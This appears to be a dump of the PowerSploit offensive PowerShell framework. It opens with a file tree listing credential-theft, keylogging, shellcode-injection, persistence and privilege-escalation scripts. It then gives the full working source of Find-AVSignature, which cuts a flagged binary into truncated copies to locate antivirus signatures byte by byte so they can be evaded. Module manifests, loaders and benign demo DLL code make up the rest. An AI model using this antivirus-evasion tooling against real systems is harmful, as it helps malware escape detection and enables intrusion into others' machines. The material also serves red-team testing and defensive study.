├── .gitignore
├── AntivirusBypass
├── AntivirusBypass.psd1
├── AntivirusBypass.psm1
├── Find-AVSignature.ps1
└── Usage.md
├── CodeExecution
├── CodeExecution.psd1
├── CodeExecution.psm1
├── Invoke-DllInjection.ps1
├── Invoke-ReflectivePEInjection.ps1
├── Invoke-ReflectivePEInjection_Resources
│ ├── DemoDLL
│ │ ├── DemoDLL.sln
│ │ └── DemoDLL
│ │ │ ├── DemoDLL.cpp
│ │ │ ├── DemoDLL.h
│ │ │ ├── DemoDLL.vcxproj
│ │ │ ├── DemoDLL.vcxproj.filters
│ │ │ ├── ReadMe.txt
│ │ │ ├── dllmain.cpp
│ │ │ ├── stdafx.cpp
│ │ │ ├── stdafx.h
│ │ │ └── targetver.h
│ ├── DemoDLL_RemoteProcess
│ │ ├── DemoDLL_RemoteProcess.sln
│ │ └── DemoDLL_RemoteProcess
│ │ │ ├── DemoDLL_RemoteProcess.cpp
│ │ │ ├── DemoDLL_RemoteProcess.vcxproj
│ │ │ ├── DemoDLL_RemoteProcess.vcxproj.filters
│ │ │ ├── ReadMe.txt
│ │ │ ├── dllmain.cpp
│ │ │ ├── stdafx.cpp
│ │ │ ├── stdafx.h
│ │ │ └── targetver.h
│ ├── DemoExe
│ │ ├── DemoExe.sln
│ │ ├── DemoExe_MD
│ │ │ ├── DemoExe_MD.cpp
│ │ │ ├── DemoExe_MD.vcxproj
│ │ │ ├── DemoExe_MD.vcxproj.filters
│ │ │ ├── ReadMe.txt
│ │ │ ├── stdafx.cpp
│ │ │ ├── stdafx.h
│ │ │ └── targetver.h
│ │ └── DemoExe_MDd
│ │ │ ├── DemoExe_MDd.cpp
│ │ │ ├── DemoExe_MDd.vcxproj
│ │ │ ├── DemoExe_MDd.vcxproj.filters
│ │ │ ├── ReadMe.txt
│ │ │ ├── stdafx.cpp
│ │ │ ├── stdafx.h
│ │ │ └── targetver.h
│ ├── ExeToInjectInTo
│ │ ├── ExeToInjectInTo.sln
│ │ └── ExeToInjectInTo
│ │ │ ├── ExeToInjectInTo.cpp
│ │ │ ├── ExeToInjectInTo.vcxproj
│ │ │ ├── ExeToInjectInTo.vcxproj.filters
│ │ │ ├── ReadMe.txt
│ │ │ ├── stdafx.cpp
│ │ │ ├── stdafx.h
│ │ │ └── targetver.h
│ └── Shellcode
│ │ ├── readme.txt
│ │ ├── x64
│ │ ├── CallDllMain.asm
│ │ ├── ExitThread.asm
│ │ ├── GetFuncAddress.asm
│ │ └── LoadLibraryA.asm
│ │ └── x86
│ │ ├── CallDllMain.asm
│ │ ├── ExitThread.asm
│ │ └── GetProcAddress.asm
├── Invoke-Shellcode.ps1
├── Invoke-WmiCommand.ps1
└── Usage.md
├── Exfiltration
├── Exfiltration.psd1
├── Exfiltration.psm1
├── Get-GPPAutologon.ps1
├── Get-GPPPassword.ps1
├── Get-Keystrokes.ps1
├── Get-MicrophoneAudio.ps1
├── Get-TimedScreenshot.ps1
├── Get-VaultCredential.ps1
├── Get-VaultCredential.ps1xml
├── Invoke-CredentialInjection.ps1
├── Invoke-Mimikatz.ps1
├── Invoke-NinjaCopy.ps1
├── Invoke-TokenManipulation.ps1
├── LogonUser
│ └── LogonUser
│ │ ├── LogonUser.sln
│ │ ├── LogonUser
│ │ ├── LogonUser.cpp
│ │ ├── LogonUser.vcxproj
│ │ ├── LogonUser.vcxproj.filters
│ │ ├── ReadMe.txt
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
│ │ └── logon
│ │ ├── ReadMe.txt
│ │ ├── dllmain.cpp
│ │ ├── logon.cpp
│ │ ├── logon.vcxproj
│ │ ├── logon.vcxproj.filters
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
├── NTFSParser
│ ├── NTFSParser.sln
│ ├── NTFSParser
│ │ ├── NTFS.h
│ │ ├── NTFSParser.cpp
│ │ ├── NTFSParser.vcxproj
│ │ ├── NTFSParser.vcxproj.filters
│ │ ├── NTFS_Attribute.h
│ │ ├── NTFS_Common.h
│ │ ├── NTFS_DataType.h
│ │ ├── NTFS_FileRecord.h
│ │ ├── ReadMe.txt
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
│ └── NTFSParserDLL
│ │ ├── NTFS.h
│ │ ├── NTFSParserDLL.cpp
│ │ ├── NTFSParserDLL.vcxproj
│ │ ├── NTFSParserDLL.vcxproj.filters
│ │ ├── NTFS_Attribute.h
│ │ ├── NTFS_Common.h
│ │ ├── NTFS_DataType.h
│ │ ├── NTFS_FileRecord.h
│ │ ├── ReadMe.txt
│ │ ├── dllmain.cpp
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
├── Out-Minidump.ps1
├── Usage.md
└── VolumeShadowCopyTools.ps1
├── LICENSE
├── Mayhem
├── Mayhem.psd1
├── Mayhem.psm1
└── Usage.md
├── Persistence
├── Persistence.psd1
├── Persistence.psm1
└── Usage.md
├── PowerSploit.psd1
├── PowerSploit.psm1
├── PowerSploit.pssproj
├── PowerSploit.sln
├── Privesc
├── Get-System.ps1
├── PowerUp.ps1
├── Privesc.psd1
├── Privesc.psm1
└── README.md
├── README.md
├── Recon
├── Dictionaries
│ ├── admin.txt
│ ├── generic.txt
│ └── sharepoint.txt
├── Get-ComputerDetails.ps1
├── Get-HttpStatus.ps1
├── Invoke-Portscan.ps1
├── Invoke-ReverseDnsLookup.ps1
├── PowerView.ps1
├── README.md
├── Recon.psd1
└── Recon.psm1
├── ScriptModification
├── Out-CompressedDll.ps1
├── Out-EncodedCommand.ps1
├── Out-EncryptedScript.ps1
├── Remove-Comments.ps1
├── ScriptModification.psd1
├── ScriptModification.psm1
└── Usage.md
└── Tests
├── CodeExecution.tests.ps1
├── Exfiltration.tests.ps1
├── PowerSploit.tests.ps1
├── Privesc.tests.ps1
└── Recon.tests.ps1
/.gitignore:
--------------------------------------------------------------------------------
1 | #################
2 | ## Eclipse
3 | #################
4 |
5 | *.pydevproject
6 | .project
7 | .metadata
8 | bin/
9 | tmp/
10 | *.tmp
11 | *.bak
12 | *.swp
13 | *~.nib
14 | local.properties
15 | .classpath
16 | .settings/
17 | .loadpath
18 |
19 | # External tool builders
20 | .externalToolBuilders/
21 |
22 | # Locally stored "Eclipse launch configurations"
23 | *.launch
24 |
25 | # CDT-specific
26 | .cproject
27 |
28 | # PDT-specific
29 | .buildpath
30 |
31 |
32 | #################
33 | ## Visual Studio
34 | #################
35 |
36 | ## Ignore Visual Studio temporary files, build results, and
37 | ## files generated by popular Visual Studio add-ons.
38 |
39 | # User-specific files
40 | *.suo
41 | *.user
42 | *.sln.docstates
43 |
44 | # Build results
45 |
46 | [Dd]ebug/
47 | [Rr]elease/
48 | build/
49 | [Bb]in/
50 | [Oo]bj/
51 |
52 | # MSTest test Results
53 | [Tt]est[Rr]esult*/
54 | [Bb]uild[Ll]og.*
55 |
56 | *_i.c
57 | *_p.c
58 | *.ilk
59 | *.meta
60 | *.obj
61 | *.pch
62 | *.pdb
63 | *.pgc
64 | *.pgd
65 | *.rsp
66 | *.sbr
67 | *.tlb
68 | *.tli
69 | *.tlh
70 | *.tmp
71 | *.tmp_proj
72 | *.log
73 | *.vspscc
74 | *.vssscc
75 | .builds
76 | *.pidb
77 | *.log
78 | *.scc
79 |
80 | # Visual C++ cache files
81 | ipch/
82 | *.aps
83 | *.ncb
84 | *.opensdf
85 | *.sdf
86 | *.cachefile
87 |
88 | # Visual Studio profiler
89 | *.psess
90 | *.vsp
91 | *.vspx
92 |
93 | # Guidance Automation Toolkit
94 | *.gpState
95 |
96 | # ReSharper is a .NET coding add-in
97 | _ReSharper*/
98 | *.[Rr]e[Ss]harper
99 |
100 | # TeamCity is a build add-in
101 | _TeamCity*
102 |
103 | # DotCover is a Code Coverage Tool
104 | *.dotCover
105 |
106 | # NCrunch
107 | *.ncrunch*
108 | .*crunch*.local.xml
109 |
110 | # Installshield output folder
111 | [Ee]xpress/
112 |
113 | # DocProject is a documentation generator add-in
114 | DocProject/buildhelp/
115 | DocProject/Help/*.HxT
116 | DocProject/Help/*.HxC
117 | DocProject/Help/*.hhc
118 | DocProject/Help/*.hhk
119 | DocProject/Help/*.hhp
120 | DocProject/Help/Html2
121 | DocProject/Help/html
122 |
123 | # Click-Once directory
124 | publish/
125 |
126 | # Publish Web Output
127 | *.Publish.xml
128 | *.pubxml
129 |
130 | # NuGet Packages Directory
131 | ## TODO: If you have NuGet Package Restore enabled, uncomment the next line
132 | #packages/
133 |
134 | # Windows Azure Build Output
135 | csx
136 | *.build.csdef
137 |
138 | # Windows Store app package directory
139 | AppPackages/
140 |
141 | # Others
142 | sql/
143 | *.Cache
144 | ClientBin/
145 | [Ss]tyle[Cc]op.*
146 | ~$*
147 | *~
148 | *.dbmdl
149 | *.[Pp]ublish.xml
150 | *.pfx
151 | *.publishsettings
152 |
153 | # RIA/Silverlight projects
154 | Generated_Code/
155 |
156 | # Backup & report files from converting an old project file to a newer
157 | # Visual Studio version. Backup files are not needed, because we have git ;-)
158 | _UpgradeReport_Files/
159 | Backup*/
160 | UpgradeLog*.XML
161 | UpgradeLog*.htm
162 |
163 | # SQL Server files
164 | App_Data/*.mdf
165 | App_Data/*.ldf
166 |
167 | #############
168 | ## Windows detritus
169 | #############
170 |
171 | # Windows image file caches
172 | Thumbs.db
173 | ehthumbs.db
174 |
175 | # Folder config file
176 | Desktop.ini
177 |
178 | # Recycle Bin used on file shares
179 | $RECYCLE.BIN/
180 |
# macOS Finder metadata
182 | .DS_Store
183 |
184 |
185 | #############
186 | ## Python
187 | #############
188 |
189 | *.py[co]
190 |
191 | # Packages
192 | *.egg
193 | *.egg-info
194 | dist/
195 | build/
196 | eggs/
197 | parts/
198 | var/
199 | sdist/
200 | develop-eggs/
201 | .installed.cfg
202 |
203 | # Installer logs
204 | pip-log.txt
205 |
206 | # Unit test / coverage reports
207 | .coverage
208 | .tox
209 |
210 | #Translations
211 | *.mo
212 |
213 | #Mr Developer
214 | .mr.developer.cfg
215 |
--------------------------------------------------------------------------------
/AntivirusBypass/AntivirusBypass.psd1:
--------------------------------------------------------------------------------
@{

# Script module or binary module file associated with this manifest.
# (The PowerShell 2.0 key name; newer engines also accept it under the name RootModule.)
ModuleToProcess = 'AntivirusBypass.psm1'

# Version number of this module.
ModuleVersion = '3.0.0.0'

# ID used to uniquely identify this module
GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b'

# Author of this module
Author = 'Matthew Graeber'

# Copyright statement for this module
Copyright = 'BSD 3-Clause'

# Description of the functionality provided by this module
Description = 'PowerSploit Antivirus Avoidance/Bypass Module'

# Minimum version of the Windows PowerShell engine required by this module
PowerShellVersion = '2.0'

# Functions to export from this module
# '*' exports every function the root module ends up defining, so any function in a
# *.ps1 file that AntivirusBypass.psm1 dot-sources becomes public automatically.
FunctionsToExport = '*'

# List of all files packaged with this module
FileList = 'AntivirusBypass.psm1', 'AntivirusBypass.psd1', 'Find-AVSignature.ps1', 'Usage.md'

}
31 |
--------------------------------------------------------------------------------
/AntivirusBypass/AntivirusBypass.psm1:
--------------------------------------------------------------------------------
# Module loader: dot-source every *.ps1 that sits beside this file so the functions
# they define (Find-AVSignature) land in the module scope.
# NOTE(review): this runs ANY *.ps1 dropped into the module directory at import time;
# keep the directory writable only by trusted users and check its contents before
# Import-Module.
$ScriptGlob = Join-Path -Path $PSScriptRoot -ChildPath '*.ps1'
Get-ChildItem -Path $ScriptGlob | ForEach-Object -Process { . $_.FullName }
2 |
--------------------------------------------------------------------------------
/AntivirusBypass/Find-AVSignature.ps1:
--------------------------------------------------------------------------------
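function Find-AVSignature
{
<#
.SYNOPSIS

Locate tiny AV signatures.

PowerSploit Function: Find-AVSignature
Authors: Chris Campbell (@obscuresec) & Matt Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

.DESCRIPTION

Locates single Byte AV signatures utilizing the same method as DSplit from "class101" on heapoverflow.com.

The input binary is written out repeatedly, each copy truncated at a different offset
(StartByte, StartByte + Interval, StartByte + 2*Interval, ... and finally EndByte), so
every output file is an exact prefix of the input. Scanning the output directory and
noting the shortest copy that is flagged brackets the signature to one Interval; the
examples below show the range and Interval being narrowed run by run down to a single byte.

Because each file is a prefix of a (presumably flagged) binary, an on-access scanner will
likely quarantine the longer copies as they are written and spoil the run. Point OutPath at a
directory excluded from real-time scanning and scan it on demand (the examples use a directory
named "exempt" for this reason).

.PARAMETER StartByte

Specifies the first byte to begin splitting on. Must be inside the file.

.PARAMETER EndByte

Specifies the last byte to split on, or the string "max" (case-insensitive) for the last
byte of the file. A value past the end of the file is clamped to the last byte; a value
below StartByte is replaced by StartByte + Interval (again clamped to the file).

.PARAMETER Interval

Specifies the interval size to split with. Must be at least 1.

.PARAMETER Path

Specifies the path to the binary you want tested. Must be a file, not a directory.

.PARAMETER OutPath

Optionally specifies the directory to write the binaries to. Created after confirmation
(or silently with -Force) if it does not exist. Existing files with the same names are
overwritten.

.PARAMETER BufferLen

Specifies the length of the file read buffer. Defaults to 64KB.

.PARAMETER Force

Forces the script to continue without confirmation: both the directory-creation prompt and
the "N binaries will be written" prompt are skipped.

.EXAMPLE

PS C:\> Find-AVSignature -Startbyte 0 -Endbyte max -Interval 10000 -Path c:\test\exempt\nc.exe
PS C:\> Find-AVSignature -StartByte 10000 -EndByte 20000 -Interval 1000 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run2 -Verbose
PS C:\> Find-AVSignature -StartByte 16000 -EndByte 17000 -Interval 100 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run3 -Verbose
PS C:\> Find-AVSignature -StartByte 16800 -EndByte 16900 -Interval 10 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run4 -Verbose
PS C:\> Find-AVSignature -StartByte 16890 -EndByte 16900 -Interval 1 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run5 -Verbose

.NOTES

Several of the versions of "DSplit.exe" available on the internet contain malware.

Output files are named <basename>_<offset>.bin, where <basename> is the input file name up
to its first '.'. One file is written per interval boundary plus one truncated exactly at
EndByte; when StartByte is 0 the first file is therefore empty.

.LINK

http://obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html
https://github.com/mattifestation/PowerSploit
http://www.exploit-monday.com/
http://heapoverflow.com/f0rums/project.php?issueid=34&filter=changes&page=2
#>

    [CmdletBinding()] Param(
        [Parameter(Mandatory = $True)]
        [ValidateRange(0,4294967295)]
        [UInt32]
        $StartByte,

        [Parameter(Mandatory = $True)]
        [String]
        $EndByte,

        # 0 would divide by zero when the number of output files is computed.
        [Parameter(Mandatory = $True)]
        [ValidateRange(1,4294967295)]
        [UInt32]
        $Interval,

        [String]
        [ValidateScript({Test-Path $_ })]
        $Path = ($pwd.path),

        [String]
        $OutPath = ($pwd),

        [ValidateRange(1,2097152)]
        [UInt32]
        $BufferLen = 65536,

        [Switch] $Force
    )

    # The input must be an existing file; Get-ChildItem on a directory would have returned
    # its children here and produced a meaningless size.
    if (!(Test-Path $Path)) {Throw "File path not found"}
    $InputFile = Get-Item $Path
    if ($InputFile.PSIsContainer) {Throw "Path must be a file, not a directory: `"$Path`""}
    if (!$InputFile.Exists) {Throw "File not found"}

    # Create the output directory if needed, prompting unless -Force was given.
    $Response = $True
    if (!(Test-Path $OutPath)) {
        if ($Force -or ($Response = $psCmdlet.ShouldContinue("The `"$OutPath`" does not exist! Do you want to create the directory?",""))) {
            # Out-Null keeps the DirectoryInfo from leaking into the function's output.
            New-Item -Path $OutPath -ItemType Directory | Out-Null
        }
    }
    if (!$Response) {Throw "Output path not found"}
    if (!(Get-Item $OutPath).PSIsContainer) {Throw "OutPath must be a directory: `"$OutPath`""}

    # .NET FileStream resolves relative paths against the process working directory, not
    # PowerShell's $pwd, so work with fully resolved provider paths from here on.
    [String] $OutDir = (Resolve-Path $OutPath).ProviderPath

    # Int64 so files larger than 2GB do not overflow the offset arithmetic.
    [Int64] $FileSize = $InputFile.Length
    [Int64] $MaximumByte = $FileSize - 1
    if ($StartByte -gt $MaximumByte) {Throw "StartByte range must be between 0 and $MaximumByte"}

    # EndByte is a string so that "max" can be accepted; resolve it to an integer here.
    if ($EndByte -eq "max") {
        [Int64] $EndByteValue = $MaximumByte
    }
    else {
        $Parsed = $EndByte -as [Int64]
        if ($Parsed -eq $null) {Throw "EndByte must be an integer or `"max`", got `"$EndByte`""}
        [Int64] $EndByteValue = $Parsed
    }

    # Clamp EndByte into the file; a value below StartByte becomes one Interval past it.
    # Both paths clamp, because an offset past the end of the file can never be satisfied
    # by the copy loop below.
    if ($EndByteValue -gt $FileSize) {$EndByteValue = $MaximumByte}
    if ($EndByteValue -lt $StartByte) {
        $EndByteValue = [Math]::Min(([Int64] $StartByte + $Interval), $MaximumByte)
    }

    Write-Verbose "StartByte: $StartByte"
    Write-Verbose "EndByte: $EndByteValue"

    # Output files are named after the input's base name (text before the first '.').
    [String] $FileName = (Split-Path $Path -Leaf).Split('.')[0]

    # Number of Interval steps between StartByte and EndByte, rounded up. One extra file,
    # truncated exactly at EndByte, is always written, so ResultNumber + 1 files result.
    [Int64] $Span = $EndByteValue - $StartByte
    [Int64] $ResultNumber = [Math]::Floor($Span / $Interval)
    if (($Span % $Interval) -gt 0) {$ResultNumber = $ResultNumber + 1}
    [Int64] $TotalFiles = $ResultNumber + 1

    # Prompt user to verify parameters to avoid writing binaries to the wrong directory.
    $Response = $True
    if (!$Force) {
        $Response = $psCmdlet.ShouldContinue("This script will result in $TotalFiles binaries being written to `"$OutDir`"!",
                                             "Do you want to continue?")
    }
    if (!$Response) {Return}

    Write-Verbose "This script will now write $TotalFiles binaries to `"$OutDir`"."

    # One read stream is reused for every output file; FileStream buffers internally, and the
    # 64KB default follows http://research.microsoft.com/pubs/64538/tr-2004-136.doc.
    [Byte[]] $ReadBuffer = New-Object Byte[] $BufferLen
    $ReadStream = New-Object System.IO.FileStream($InputFile.FullName, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read, $BufferLen)
    try {
        for ([Int64] $i = 0; $i -le $ResultNumber; $i++)
        {
            # The final file is cut exactly at EndByte; the others at StartByte + i*Interval.
            if ($i -eq $ResultNumber) {[Int64] $SplitByte = $EndByteValue}
            else {[Int64] $SplitByte = $StartByte + ($Interval * $i)}

            Write-Verbose "Byte 0 -> $SplitByte"

            # Every output file starts from byte 0 of the input.
            $ReadStream.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null

            [String] $OutFile = Join-Path $OutDir "$($FileName)_$($SplitByte).bin"
            $WriteStream = New-Object System.IO.FileStream($OutFile, [System.IO.FileMode]::Create, [System.IO.FileAccess]::Write, [System.IO.FileShare]::None, $BufferLen)
            try {
                Write-Verbose "$($WriteStream.Name)"

                # Copy the first SplitByte bytes of the input in BufferLen-sized chunks.
                [Int64] $BytesLeft = $SplitByte
                while ($BytesLeft -gt 0) {
                    [Int32] $ChunkLen = [Math]::Min([Int64] $BufferLen, $BytesLeft)
                    [Int32] $Count = $ReadStream.Read($ReadBuffer, 0, $ChunkLen)
                    # Read returns 0 at end of file; without this guard the loop would spin forever.
                    if ($Count -le 0) {Throw "Unexpected end of file in `"$Path`" with $BytesLeft bytes still to copy"}
                    $WriteStream.Write($ReadBuffer, 0, $Count)
                    $BytesLeft = $BytesLeft - $Count
                }
            }
            finally {
                # Close the output even if the copy throws, so no handle is left open.
                $WriteStream.Close()
                $WriteStream.Dispose()
            }
        }
    }
    finally {
        $ReadStream.Dispose()
    }

    Write-Verbose "Files written to disk. Flushing memory."
    # During testing using large binaries, memory usage was excessive so lets fix that
    [System.GC]::Collect()
    Write-Verbose "Completed!"
}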
187 |
--------------------------------------------------------------------------------
/AntivirusBypass/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire AntivirusBypass folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module AntivirusBypass`
7 |
8 | To see the commands imported, type `Get-Command -Module AntivirusBypass`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
Note: Every script in this module is self-contained and can be dot-sourced and run on its own; packaging them as a module only makes them easier to carry around and import together.
--------------------------------------------------------------------------------
/CodeExecution/CodeExecution.psd1:
--------------------------------------------------------------------------------
@{

# Script module or binary module file associated with this manifest.
# (The PowerShell 2.0 key name; newer engines also accept it under the name RootModule.)
ModuleToProcess = 'CodeExecution.psm1'

# Version number of this module.
ModuleVersion = '3.0.0.0'

# ID used to uniquely identify this module
GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c'

# Author of this module
Author = 'Matthew Graeber'

# Company or vendor of this module
CompanyName = ''

# Copyright statement for this module
Copyright = 'BSD 3-Clause'

# Description of the functionality provided by this module
Description = 'PowerSploit Code Execution Module'

# Minimum version of the Windows PowerShell engine required by this module
PowerShellVersion = '2.0'

# Functions to export from this module
# '*' exports every function the root module ends up defining, so any function in a
# *.ps1 file that CodeExecution.psm1 dot-sources becomes public automatically.
FunctionsToExport = '*'

# List of all files packaged with this module
# The Invoke-ReflectivePEInjection_Resources tree (demo DLL/EXE sources and shellcode)
# is deliberately not listed: it is build material, not part of the runtime module.
FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke-Shellcode.ps1', 'Invoke-DllInjection.ps1',
'Invoke-ReflectivePEInjection.ps1', 'Invoke-WmiCommand.ps1', 'Usage.md'
}
34 |
--------------------------------------------------------------------------------
/CodeExecution/CodeExecution.psm1:
--------------------------------------------------------------------------------
# Module loader: dot-source every *.ps1 that sits beside this file (Invoke-Shellcode.ps1,
# Invoke-DllInjection.ps1, Invoke-ReflectivePEInjection.ps1, Invoke-WmiCommand.ps1) so the
# functions they define land in the module scope.
# NOTE(review): this runs ANY *.ps1 dropped into the module directory at import time;
# keep the directory writable only by trusted users and check its contents before
# Import-Module.
$ScriptGlob = Join-Path -Path $PSScriptRoot -ChildPath '*.ps1'
Get-ChildItem -Path $ScriptGlob | ForEach-Object -Process { . $_.FullName }
2 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 11.00
3 | # Visual Studio 2010
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoDLL", "DemoDLL\DemoDLL.vcxproj", "{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|Win32.Build.0 = Debug|Win32
16 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|x64.ActiveCfg = Debug|x64
17 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|x64.Build.0 = Debug|x64
18 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|Win32.ActiveCfg = Release|Win32
19 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|Win32.Build.0 = Release|Win32
20 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|x64.ActiveCfg = Release|x64
21 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.cpp:
--------------------------------------------------------------------------------
1 | // DemoDLL.cpp : Defines the exported functions for the DLL application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include "DemoDLL.h"
6 |
7 | using namespace std;
8 |
9 |
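// Builds the demo message in a string stream and hands the caller a heap copy of it.
//
// Returns a NUL-terminated buffer allocated with new[]; the caller owns it and must
// release it with delete[]. (When invoked through Invoke-ReflectivePEInjection the
// PowerShell side presumably copies the text out and the buffer is never freed —
// fine for a demo, not for production code.)
extern "C" __declspec( dllexport ) char* StringFunc()
{
    // Stack-allocated stream; the original new'd it and never deleted it (leak).
    std::ostringstream stringStream;
    std::ostream *outputStream = &stringStream;

    // To write to the console instead, point outputStream at &std::cout. This lets the
    // same code switch between producing a string and printing.
    //outputStream = &std::cout;

    (*outputStream) << "String DLL function is working" << std::endl << std::endl;

    const std::string output = stringStream.str();

    // size()+1 leaves room for the terminator, which string::copy does not write.
    char* out = new char[output.size() + 1];
    output.copy(out, output.size());
    out[output.size()] = '\0';

    return out;
}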
32 |
// Prints a fixed banner to the host process's stdout. Nothing is returned, so the
// only evidence the call happened is the console output, which is visible only
// when the DLL runs in the local process.
extern "C" __declspec( dllexport ) void VoidFunc()
{
    static const char banner[] =
        "Void DLL function is working, using printf to display. You will only see this if you run locally.\n\n";
    // The text contains no format directives, so fputs emits exactly what printf did.
    std::fputs(banner, stdout);
}
38 |
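// Wide-character twin of StringFunc: builds the demo message in a wide string
// stream and hands the caller a heap copy of it.
//
// Returns a NUL-terminated wchar_t buffer allocated with new[]; the caller owns it and
// must release it with delete[].
extern "C" __declspec( dllexport ) wchar_t* WStringFunc()
{
    // Stack-allocated stream; the original new'd it and never deleted it (leak).
    std::wostringstream stringStream;
    std::wostream *outputStream = &stringStream;

    // To write to the console instead, point outputStream at &std::wcout. (The original
    // assigned &wcout and immediately overwrote it with the string stream — a dead store.)
    //outputStream = &std::wcout;

    (*outputStream) << L"WString DLL function is working" << std::endl << std::endl;

    const std::wstring output = stringStream.str();

    // size()+1 leaves room for the terminator, which wstring::copy does not write.
    wchar_t* out = new wchar_t[output.size() + 1];
    output.copy(out, output.size());
    out[output.size()] = L'\0';

    return out;
}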
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.h:
--------------------------------------------------------------------------------
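// DemoDLL.h : exported surface of the demo DLL used with Invoke-ReflectivePEInjection.
// Include guard added: the original header had none, so including it twice in one
// translation unit would redeclare the functions.
#pragma once

// The following ifdef block is the standard way of creating macros which make exporting
// from a DLL simpler. All files within this DLL are compiled with the DEMODLL_EXPORTS
// symbol defined on the command line. This symbol should not be defined on any project
// that uses this DLL. This way any other project whose source files include this file see
// DEMODLL_API functions as being imported from a DLL, whereas this DLL sees symbols
// defined with this macro as being exported.
#ifdef DEMODLL_EXPORTS
#define DEMODLL_API __declspec(dllexport)
#else
#define DEMODLL_API __declspec(dllimport)
#endif

// NOTE(review): a using-directive in a header leaks into every includer. Kept because
// the DLL sources rely on it; prefer explicit std:: qualification in new code.
using namespace std;

// NOTE(review): these declarations spell out dllexport instead of DEMODLL_API, so a
// consumer including this header sees dllexport rather than dllimport and the macro
// above is effectively unused. Switching them to DEMODLL_API would also require the
// matching definitions in DemoDLL.cpp to change, or MSVC reports conflicting linkage.
//
// StringFunc and WStringFunc each return a NUL-terminated buffer allocated with new[]
// that the caller must release with delete[]. VoidFunc only prints to stdout.
extern "C" __declspec( dllexport ) char* StringFunc();
extern "C" __declspec( dllexport ) void VoidFunc();
extern "C" __declspec( dllexport ) wchar_t* WStringFunc();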
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 | Source Files
40 |
41 |
42 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : DemoDLL Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DemoDLL DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DemoDLL application.
9 |
10 |
11 | DemoDLL.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DemoDLL.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
